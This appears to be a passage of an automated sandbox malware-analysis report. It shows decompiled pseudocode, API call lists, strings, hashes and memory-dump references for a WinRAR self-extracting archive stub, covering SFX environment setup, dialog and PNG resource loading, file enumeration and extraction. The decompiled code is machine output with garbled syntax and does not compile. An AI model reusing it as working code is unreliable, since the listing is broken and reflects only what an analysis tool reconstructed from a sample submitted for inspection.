					E001AC8F0(_t55);
					CloseHandle( *0x1ede2c);
				}
				_t99 =  *0x1d00e0; // 0x0
				if( *0x1ede21 != 0) {
					_t58 =  *0x1cd5fc; // 0x3e8
					if( *0x1ede22 == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t99 = _t99 - _t58;
							__eflags = _t99;
						}
					} else {
						_t99 =  *0x1ede24;
						if(_t58 > 0) {
							_t99 = _t99 + _t58;
						}
					}
				}
				E001A9B08(_t107 + 0x1c); // executed
				return _t99;
			}

0x001acbb8
0x001acbb8
0x001acbc3
0x001acbd2
0x001acbdb
0x001acbe5
0x001acbef
0x001acbf8
0x001acbfd
0x001acc06
0x001acc08
0x001acc0a
0x001acc0c
0x001acc0d
0x001acc18
0x001acc85
0x001acc1a
0x001acc2d
0x001acc31
0x001acc72
0x001acc78
0x001acc78
0x001acc7b
0x001acc81
0x001acc18
0x001acc96
0x001acca8
0x001accaf
0x001accba
0x001accc0
0x001accc6
0x001acccc
0x001accd2
0x001accd8
0x001accee
0x001accf3
0x001acd00
0x001acd09
0x001acd0e
0x001acd14
0x001acd1a
0x001acd20
0x001acd30
0x001acd35
0x001acd3e
0x001acd47
0x001acd57
0x001acd66
0x001acd6b
0x001acd75
0x001acd7b
0x001acd81
0x001acd8a
0x001acd8f
0x001acd96
0x001acd99
0x001acd99
0x001acda6
0x001acda8
0x001acda8
0x001acdb2
0x001acdbe
0x001acdc6
0x001acdcb
0x001acdd8
0x001acdda
0x001acde1
0x001acde4
0x001acde4
0x001acded
0x001ace02
0x001ace02
0x001ace07
0x001ace0c
0x001ace15
0x001ace18
0x001ace23
0x001ace23
0x001ace30
0x001ace36
0x001ace3f
0x001ace44
0x001ace54
0x001ace56
0x001ace58
0x001ace58
0x001ace58
0x001ace46
0x001ace46
0x001ace4e
0x001ace50
0x001ace50
0x001ace4e
0x001ace44
0x001ace5e
0x001ace6e

APIs

Part of subcall function 0019FD49: GetModuleHandleW.KERNEL32 ref: 0019FD61
Part of subcall function 0019FD49: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0019FD79
Part of subcall function 0019FD49: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0019FD9C

Part of subcall function 001A95F8: GetCurrentDirectoryW.KERNEL32(?,?), ref: 001A9600

Part of subcall function 001A9AA0: OleInitialize.OLE32(00000000), ref: 001A9AB9
Part of subcall function 001A9AA0: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001A9AF0
Part of subcall function 001A9AA0: SHGetMalloc.SHELL32(001D75C0), ref: 001A9AFA

Part of subcall function 001A1017: GetCPInfo.KERNEL32(00000000,?), ref: 001A1028
Part of subcall function 001A1017: IsDBCSLeadByte.KERNEL32(00000000), ref: 001A103C

GetCommandLineW.KERNEL32 ref: 001ACC00
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 001ACC27
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 001ACC38
UnmapViewOfFile.KERNEL32(00000000), ref: 001ACC72

Part of subcall function 001AC891: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 001AC8A7
Part of subcall function 001AC891: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 001AC8E3

CloseHandle.KERNEL32(00000000), ref: 001ACC7B
GetModuleFileNameW.KERNEL32(00000000,001ECE18,00000800), ref: 001ACC96
SetEnvironmentVariableW.KERNELBASE(sfxname,001ECE18), ref: 001ACCA8
GetLocalTime.KERNEL32(?), ref: 001ACCAF
_swprintf.LIBCMT ref: 001ACCEE
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 001ACD00
GetModuleHandleW.KERNEL32(00000000), ref: 001ACD03
LoadIconW.USER32(00000000,00000064), ref: 001ACD1A
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A5D1,00000000), ref: 001ACD6B
Sleep.KERNEL32(?), ref: 001ACD99
DeleteObject.GDI32 ref: 001ACDD8
DeleteObject.GDI32(?), ref: 001ACDE4
CloseHandle.KERNEL32 ref: 001ACE23

Strings

C:\Users\user\Desktop, xrefs: 001ACBCD
winrarsfxmappingfile.tmp, xrefs: 001ACC1B
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 001ACCDF
sfxstime, xrefs: 001ACCFB
STARTDLG, xrefs: 001ACD60
sfxname, xrefs: 001ACCA3

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-433059772
Opcode ID: e6e323cbbbdd1da5326edac1a041bc8f7a2e3a273ddbf906d6977570b54813d5
Instruction ID: f8ec265bbc140ee70839a2cc49a4e1e9e362981bd8f309d0aaa7f2e8d2d61b27
Opcode Fuzzy Hash: e6e323cbbbdd1da5326edac1a041bc8f7a2e3a273ddbf906d6977570b54813d5
Instruction Fuzzy Hash: B7610375505340AFD711ABB5EC89F6B7BACBB6AB00F04042AF506A6591EBB4CC84C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 001A963A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 92
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E001A963A(WCHAR* _a4) {
				WCHAR* _v4;
				intOrPtr _v8;
				intOrPtr* _v16;
				char _v20;
				void* __ecx;
				struct HRSRC__* _t14;
				WCHAR* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t30;
				long _t32;
				void* _t34;
				intOrPtr* _t35;
				void* _t40;
				struct HRSRC__* _t42;
				intOrPtr* _t44;

				_t14 = FindResourceW( *0x1d0060, _a4, "PNG");
				_t42 = _t14;
				if(_t42 == 0) {
					return _t14;
				}
				_t32 = SizeofResource( *0x1d0060, _t42);
				if(_t32 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0x1d0060, _t42);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t43 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t32); // executed
					_t40 = _t19;
					if(_t40 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t40) == 0) {
						L14:
						GlobalFree(_t40);
						goto L15;
					}
					E001AEA80(_t20, _t43, _t32);
					_a4 = 0;
					_push( &_a4);
					_push(0);
					_push(_t40);
					if( *0x1cdff8() == 0) {
						_t26 = E001A95CF(_t24, _t34, _v8, 0); // executed
						_t35 = _v16;
						_t44 = _t26;
						 *((intOrPtr*)( *_t35 + 8))(_t35);
						if(_t44 != 0) {
							 *((intOrPtr*)(_t44 + 8)) = 0;
							if( *((intOrPtr*)(_t44 + 8)) == 0) {
								_push(0xffffff);
								_t30 =  &_v20;
								_push(_t30);
								_push( *((intOrPtr*)(_t44 + 4)));
								L001AD81A(); // executed
								if(_t30 != 0) {
									 *((intOrPtr*)(_t44 + 8)) = _t30;
								}
							}
							 *((intOrPtr*)( *_t44))(1);
						}
					}
					GlobalUnlock(_t40);
					goto L14;
				}
				goto L4;
			}

0x001a964b
0x001a9651
0x001a9655
0x001a9732
0x001a9732
0x001a9669
0x001a966d
0x001a968d
0x001a968d
0x001a972f
0x00000000
0x001a972f
0x001a9676
0x001a967e
0x00000000
0x00000000
0x001a9681
0x001a9687
0x001a968b
0x001a969b
0x001a969f
0x001a96a5
0x001a96a9
0x001a9729
0x001a9729
0x00000000
0x001a972e
0x001a96b4
0x001a9722
0x001a9723
0x00000000
0x001a9723
0x001a96b9
0x001a96c1
0x001a96c9
0x001a96ca
0x001a96cb
0x001a96d4
0x001a96db
0x001a96e0
0x001a96e4
0x001a96e9
0x001a96ee
0x001a96f3
0x001a96f8
0x001a96fa
0x001a96ff
0x001a9703
0x001a9704
0x001a9707
0x001a970e
0x001a9710
0x001a9710
0x001a970e
0x001a9719
0x001a9719
0x001a96ee
0x001a971c
0x00000000
0x001a971c
0x00000000

APIs

FindResourceW.KERNEL32(00000066,PNG,?,?,001AA54A,00000066), ref: 001A964B
SizeofResource.KERNEL32(00000000,77125B70,?,?,001AA54A,00000066), ref: 001A9663
LoadResource.KERNEL32(00000000,?,?,001AA54A,00000066), ref: 001A9676
LockResource.KERNEL32(00000000,?,?,001AA54A,00000066), ref: 001A9681
GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,001AA54A,00000066), ref: 001A969F
GlobalLock.KERNEL32 ref: 001A96AC
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 001A9707
GlobalUnlock.KERNEL32(00000000), ref: 001A971C
GlobalFree.KERNEL32 ref: 001A9723

Strings

PNG, xrefs: 001A963C

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: a93743d03bbd0f04ecbceaf1e2fd784fd2bc7ba294aff5e1c952c0f866e7451d
Instruction ID: a0d6aab581d23b95fe02149f30cf0d060fad80f907806177cd13bd99bf4353f4
Opcode Fuzzy Hash: a93743d03bbd0f04ecbceaf1e2fd784fd2bc7ba294aff5e1c952c0f866e7451d
Instruction Fuzzy Hash: 002193B5611316AFC3229F61DC88E2B7FE9EF56790B15452DF945C2560DB31CC80CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0019A2DF, Relevance: 7.6, APIs: 5, Instructions: 108
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0019A2DF(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				void* _t73;
				void* _t82;
				intOrPtr _t84;
				void* _t87;
				signed int _t89;
				void* _t90;

				_t82 = __edx;
				E001AD940();
				_push(_t89);
				_t87 = _a4692;
				_t84 = _a4700;
				_t90 = _t89 | 0xffffffff;
				_push( &_v0);
				if(_t87 != _t90) {
					_t43 = FindNextFileW(_t87, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t87 = _t90;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t84 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t87 - _t90;
					if(_t87 != _t90) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t87 = _t65;
					if(_t87 != _t90) {
						L13:
						E0019FAB1(_t84, _a4696, 0x800);
						_push(0x800);
						E0019B9B9(__eflags, _t84,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t84 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t84 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t84 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t84 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t84 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t84 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t84 + 0x1038)) = _v4;
						 *(_t84 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t84 + 0x1004)) = _a4;
						E001A0A81(_t84 + 0x1010, _t82,  &_v4);
						E001A0A81(_t84 + 0x1018, _t82,  &_v24);
						E001A0A81(_t84 + 0x1020, _t82,  &_v20);
					} else {
						if(E0019B32C(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t84 + 0x1044)) = _t69;
						} else {
							_t73 = FindFirstFileW( &_a592,  &_v0); // executed
							_t87 = _t73;
							if(_t87 != _t90) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t84 + 0x1040) =  *(_t84 + 0x1040) & 0x00000000;
				return _t87;
			}

0x0019a2df
0x0019a2e4
0x0019a2ea
0x0019a2ec
0x0019a2f8
0x0019a2ff
0x0019a302
0x0019a305
0x0019a37a
0x0019a380
0x0019a382
0x0019a384
0x0019a386
0x0019a38c
0x0019a38f
0x0019a38f
0x0019a392
0x0019a392
0x0019a398
0x0019a39a
0x00000000
0x00000000
0x0019a307
0x0019a314
0x0019a316
0x0019a31a
0x0019a3a0
0x0019a3ae
0x0019a3b3
0x0019a3ba
0x0019a3c5
0x0019a3c5
0x0019a3c9
0x0019a3d3
0x0019a3d6
0x0019a3e0
0x0019a3ea
0x0019a3f4
0x0019a3fe
0x0019a408
0x0019a412
0x0019a41c
0x0019a429
0x0019a439
0x0019a449
0x0019a320
0x0019a33b
0x0019a352
0x0019a352
0x0019a35b
0x0019a36c
0x0019a36c
0x0019a367
0x0019a369
0x0019a369
0x0019a36e
0x0019a33d
0x0019a34a
0x0019a34c
0x0019a350
0x00000000
0x00000000
0x00000000
0x00000000
0x0019a350
0x0019a33b
0x0019a31a
0x0019a44e
0x0019a461

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0019A1DA,000000FF,?,?), ref: 0019A314
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0019A1DA,000000FF,?,?), ref: 0019A34A
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0019A1DA,000000FF,?,?), ref: 0019A352
FindNextFileW.KERNEL32(?,?,?,?,?,?,0019A1DA,000000FF,?,?), ref: 0019A37A
GetLastError.KERNEL32(?,?,?,?,0019A1DA,000000FF,?,?), ref: 0019A386

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: d2a478e92d6ed58cd7560ad54d61d7ab4237eb8f95f6ff212142150a886fa996
Instruction ID: e94a4bb90356ae534e8a707e1be1f39a8c69e1131b3a8cdf914add42b3de35f3
Opcode Fuzzy Hash: d2a478e92d6ed58cd7560ad54d61d7ab4237eb8f95f6ff212142150a886fa996
Instruction Fuzzy Hash: 81419376604341AFC725DF34C880ADAF7E8BF49340F440A2AF5D9D3240D774AA58CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001B6AF3, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001B6AF3(int _a4) {
				void* _t14;
				void* _t16;

				if(E001B9D6E(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E001B6B78(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x001b6aff
0x001b6b1b
0x001b6b1b
0x001b6b24
0x001b6b2d

APIs

GetCurrentProcess.KERNEL32(?,?,001B6AC9,?,001CA800,0000000C,001B6C20,?,00000002,00000000), ref: 001B6B14
TerminateProcess.KERNEL32(00000000,?,001B6AC9,?,001CA800,0000000C,001B6C20,?,00000002,00000000), ref: 001B6B1B
ExitProcess.KERNEL32 ref: 001B6B2D

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: d563ab0d3cd07a2f1cc478f7f6a01e6c255b88c9af87f003bb751d40a268150f
Instruction ID: 128339a2ceff68aaa11b521ddd6a1918197162307f5419e61b7d2c501b8041e5
Opcode Fuzzy Hash: d563ab0d3cd07a2f1cc478f7f6a01e6c255b88c9af87f003bb751d40a268150f
Instruction Fuzzy Hash: 8BE0EC31100248AFCF116FA4DE09E983F79EF64741F044414FA058B531CB39DD92CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001983C0, Relevance: 3.9, APIs: 2, Instructions: 940
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E001983C0(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t370;
				signed int _t374;
				signed int _t375;
				signed int _t380;
				signed int _t385;
				void* _t387;
				signed int _t388;
				signed int _t392;
				signed int _t393;
				signed int _t398;
				signed int _t403;
				signed int _t404;
				signed int _t408;
				signed int _t418;
				signed int _t419;
				signed int _t422;
				signed int _t423;
				signed int _t432;
				char _t434;
				char _t436;
				signed int _t437;
				signed int _t438;
				signed int _t460;
				signed int _t469;
				intOrPtr _t472;
				char _t479;
				signed int _t480;
				void* _t491;
				void* _t499;
				void* _t501;
				signed int _t511;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t520;
				signed int _t523;
				signed int _t531;
				signed int _t541;
				signed int _t543;
				signed int _t545;
				signed int _t547;
				signed char _t548;
				signed int _t551;
				void* _t556;
				signed int _t564;
				intOrPtr* _t574;
				intOrPtr _t576;
				signed int _t577;
				signed int _t586;
				intOrPtr _t589;
				signed int _t592;
				signed int _t601;
				signed int _t608;
				signed int _t610;
				signed int _t611;
				signed int _t613;
				signed int _t631;
				signed int _t632;
				void* _t639;
				void* _t640;
				signed int _t656;
				signed int _t667;
				intOrPtr _t668;
				void* _t670;
				signed int _t671;
				signed int _t672;
				signed int _t673;
				signed int _t674;
				signed int _t675;
				signed int _t681;
				intOrPtr _t683;
				signed int _t688;
				intOrPtr _t690;
				signed int _t692;
				signed int _t696;
				void* _t698;
				signed int _t699;
				signed int _t702;
				signed int _t703;
				void* _t706;
				void* _t708;
				void* _t710;

				_t576 = __ecx;
				E001AD870(E001C12F2, _t706);
				E001AD940();
				_t574 =  *((intOrPtr*)(_t706 + 8));
				_t665 = 0;
				_t683 = _t576;
				 *((intOrPtr*)(_t706 - 0x20)) = _t683;
				_t370 =  *( *(_t683 + 8) + 0x82f2) & 0x0000ffff;
				 *(_t706 - 0x18) = _t370;
				if( *(_t706 + 0xc) != 0) {
					L6:
					_t690 =  *((intOrPtr*)(_t574 + 0x21dc));
					__eflags = _t690 - 2;
					if(_t690 == 2) {
						 *(_t683 + 0x10f5) = _t665;
						__eflags =  *(_t574 + 0x32dc) - _t665;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t574 + 0x32e4) - _t665;
							if(__eflags > 0) {
								L26:
								_t577 =  *(_t683 + 8);
								__eflags =  *((intOrPtr*)(_t577 + 0x615c)) - _t665;
								if( *((intOrPtr*)(_t577 + 0x615c)) != _t665) {
									L29:
									 *(_t706 - 0x11) = _t665;
									_t35 = _t706 - 0x51a8; // -18856
									_t36 = _t706 - 0x11; // 0x7ef
									_t374 = E00195C80(_t577, _t574 + 0x2280, _t36, 6, _t665, _t35, 0x800);
									__eflags = _t374;
									_t375 = _t374 & 0xffffff00 | _t374 != 0x00000000;
									 *(_t706 - 0x10) = _t375;
									__eflags = _t375;
									if(_t375 != 0) {
										__eflags =  *(_t706 - 0x11);
										if( *(_t706 - 0x11) == 0) {
											__eflags = 0;
											 *((char*)(_t683 + 0xf1)) = 0;
										}
									}
									E00191F1B(_t574);
									_push(0x800);
									_t43 = _t706 - 0x113c; // -2364
									_push(_t574 + 0x22a8);
									E0019AFA3();
									__eflags =  *((char*)(_t574 + 0x3373));
									 *(_t706 - 0x1c) = 1;
									if( *((char*)(_t574 + 0x3373)) == 0) {
										_t380 = E00192005(_t574);
										__eflags = _t380;
										if(_t380 == 0) {
											_t548 =  *(_t683 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t548 + 0x72bc));
											asm("sbb al, al");
											_t61 = _t706 - 0x10;
											 *_t61 =  *(_t706 - 0x10) &  !_t548;
											__eflags =  *_t61;
										}
									} else {
										_t551 =  *( *(_t683 + 8) + 0x72bc);
										__eflags = _t551 - 1;
										if(_t551 != 1) {
											__eflags =  *(_t706 - 0x11);
											if( *(_t706 - 0x11) == 0) {
												__eflags = _t551;
												 *(_t706 - 0x10) =  *(_t706 - 0x10) & (_t551 & 0xffffff00 | _t551 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t706 - 0x113c; // -2364
												_t556 = E0019B8F2(_t54);
												_t656 =  *(_t683 + 8);
												__eflags =  *((intOrPtr*)(_t656 + 0x72bc)) - 1 - _t556;
												if( *((intOrPtr*)(_t656 + 0x72bc)) - 1 != _t556) {
													 *(_t706 - 0x10) = 0;
												} else {
													_t57 = _t706 - 0x113c; // -2364
													_push(1);
													E0019B8F2(_t57);
												}
											}
										}
									}
									 *((char*)(_t683 + 0x5f)) =  *((intOrPtr*)(_t574 + 0x3319));
									 *((char*)(_t683 + 0x60)) = 0;
									asm("sbb eax, [ebx+0x32dc]");
									 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca8)) -  *(_t574 + 0x32d8),  *((intOrPtr*)(_t574 + 0x6cac)), 0);
									_t667 = 0;
									_t385 = 0;
									 *(_t706 + 0xb) = 0;
									 *(_t706 + 0xc) = 0;
									__eflags =  *(_t706 - 0x10);
									if( *(_t706 - 0x10) != 0) {
										L43:
										_t692 =  *(_t706 - 0x18);
										_t586 =  *((intOrPtr*)( *(_t683 + 8) + 0x61f9));
										_t387 = 0x49;
										__eflags = _t586;
										if(_t586 == 0) {
											L45:
											_t388 = _t667;
											L46:
											__eflags = _t586;
											_t82 = _t706 - 0x113c; // -2364
											_t392 = E001A0FD9(_t586, _t82, (_t388 & 0xffffff00 | _t586 == 0x00000000) & 0x000000ff, _t388,  *(_t706 + 0xc)); // executed
											__eflags = _t392;
											if(__eflags == 0) {
												L219:
												_t393 = 0;
												L16:
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t706 - 0xc));
												return _t393;
											}
											 *((intOrPtr*)(_t706 - 0x38)) = _t683 + 0x10f6;
											_t85 = _t706 - 0x113c; // -2364
											E001980B1(_t683, __eflags, _t574, _t85, _t683 + 0x10f6, 0x800);
											__eflags =  *(_t706 + 0xb);
											if( *(_t706 + 0xb) != 0) {
												L50:
												 *(_t706 + 0xf) = 0;
												L51:
												_t398 =  *(_t683 + 8);
												_t589 = 0x45;
												__eflags =  *((char*)(_t398 + 0x6153));
												_t668 = 0x58;
												 *((intOrPtr*)(_t706 - 0x34)) = _t589;
												 *((intOrPtr*)(_t706 - 0x30)) = _t668;
												if( *((char*)(_t398 + 0x6153)) != 0) {
													L53:
													__eflags = _t692 - _t589;
													if(_t692 == _t589) {
														L55:
														_t96 = _t706 - 0x31a8; // -10664
														E00196EF9(_t96);
														_push(0);
														_t97 = _t706 - 0x31a8; // -10664
														_t403 = E0019A1B1(_t96, _t668, __eflags, _t683 + 0x10f6, _t97);
														__eflags = _t403;
														if(_t403 == 0) {
															_t404 =  *(_t683 + 8);
															__eflags =  *((char*)(_t404 + 0x6153));
															_t108 = _t706 + 0xf;
															 *_t108 =  *(_t706 + 0xf) & (_t404 & 0xffffff00 |  *((char*)(_t404 + 0x6153)) != 0x00000000) - 0x00000001;
															__eflags =  *_t108;
															L61:
															_t110 = _t706 - 0x113c; // -2364
															_t408 = E00197BE2(_t110, _t574, _t110);
															__eflags = _t408;
															if(_t408 != 0) {
																while(1) {
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		goto L65;
																	}
																	_t115 = _t706 - 0x113c; // -2364
																	_t541 = E0019807D(_t683, _t574);
																	__eflags = _t541;
																	if(_t541 == 0) {
																		 *((char*)(_t683 + 0x20f6)) = 1;
																		goto L219;
																	}
																	L65:
																	_t117 = _t706 - 0x13c; // 0x6c4
																	_t592 = 0x40;
																	memcpy(_t117,  *(_t683 + 8) + 0x5024, _t592 << 2);
																	_t710 = _t708 + 0xc;
																	asm("movsw");
																	_t120 = _t706 - 0x2c; // 0x7d4
																	_t683 =  *((intOrPtr*)(_t706 - 0x20));
																	 *(_t706 - 4) = 0;
																	asm("sbb ecx, ecx");
																	_t127 = _t706 - 0x13c; // 0x6c4
																	E0019C634(_t683 + 0x10, 0,  *((intOrPtr*)(_t574 + 0x331c)), _t127,  ~( *(_t574 + 0x3320) & 0x000000ff) & _t574 + 0x00003321, _t574 + 0x3331,  *((intOrPtr*)(_t574 + 0x336c)), _t574 + 0x334b, _t120);
																	__eflags =  *((char*)(_t574 + 0x331b));
																	if( *((char*)(_t574 + 0x331b)) == 0) {
																		L73:
																		 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																		_t146 = _t706 - 0x13c; // 0x6c4
																		L0019E724(_t146);
																		_t147 = _t706 - 0x2160; // -6496
																		E0019943C(_t147);
																		_t418 =  *(_t574 + 0x3380);
																		 *(_t706 - 4) = 1;
																		 *(_t706 - 0x24) = _t418;
																		_t670 = 0x50;
																		__eflags = _t418;
																		if(_t418 == 0) {
																			L83:
																			_t419 = E00192005(_t574);
																			__eflags = _t419;
																			if(_t419 == 0) {
																				_t601 =  *(_t706 + 0xf);
																				__eflags = _t601;
																				if(_t601 == 0) {
																					_t696 =  *(_t706 - 0x18);
																					L96:
																					__eflags =  *((char*)(_t574 + 0x6cb4));
																					if( *((char*)(_t574 + 0x6cb4)) == 0) {
																						__eflags = _t601;
																						if(_t601 == 0) {
																							L212:
																							 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																							_t358 = _t706 - 0x2160; // -6496
																							E0019946E(_t358);
																							__eflags =  *(_t706 - 0x10);
																							_t385 =  *(_t706 + 0xf);
																							_t671 =  *(_t706 + 0xb);
																							if( *(_t706 - 0x10) != 0) {
																								_t362 = _t683 + 0xec;
																								 *_t362 =  *(_t683 + 0xec) + 1;
																								__eflags =  *_t362;
																							}
																							L214:
																							__eflags =  *((char*)(_t683 + 0x60));
																							if( *((char*)(_t683 + 0x60)) != 0) {
																								goto L219;
																							}
																							__eflags = _t385;
																							if(_t385 != 0) {
																								L15:
																								_t393 = 1;
																								goto L16;
																							}
																							__eflags =  *((intOrPtr*)(_t574 + 0x6cb4)) - _t385;
																							if( *((intOrPtr*)(_t574 + 0x6cb4)) != _t385) {
																								__eflags = _t671;
																								if(_t671 != 0) {
																									goto L15;
																								}
																								goto L219;
																							}
																							L217:
																							E00191E3B(_t574);
																							goto L15;
																						}
																						L101:
																						_t422 =  *(_t683 + 8);
																						__eflags =  *((char*)(_t422 + 0x61f9));
																						if( *((char*)(_t422 + 0x61f9)) == 0) {
																							L103:
																							_t423 =  *(_t706 + 0xb);
																							__eflags = _t423;
																							if(_t423 != 0) {
																								L108:
																								 *((char*)(_t706 - 0xf)) = 1;
																								__eflags = _t423;
																								if(_t423 != 0) {
																									L110:
																									 *((intOrPtr*)(_t683 + 0xe8)) =  *((intOrPtr*)(_t683 + 0xe8)) + 1;
																									 *((intOrPtr*)(_t683 + 0x80)) = 0;
																									 *((intOrPtr*)(_t683 + 0x84)) = 0;
																									 *((intOrPtr*)(_t683 + 0x88)) = 0;
																									 *((intOrPtr*)(_t683 + 0x8c)) = 0;
																									E0019A728(_t683 + 0xc8, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
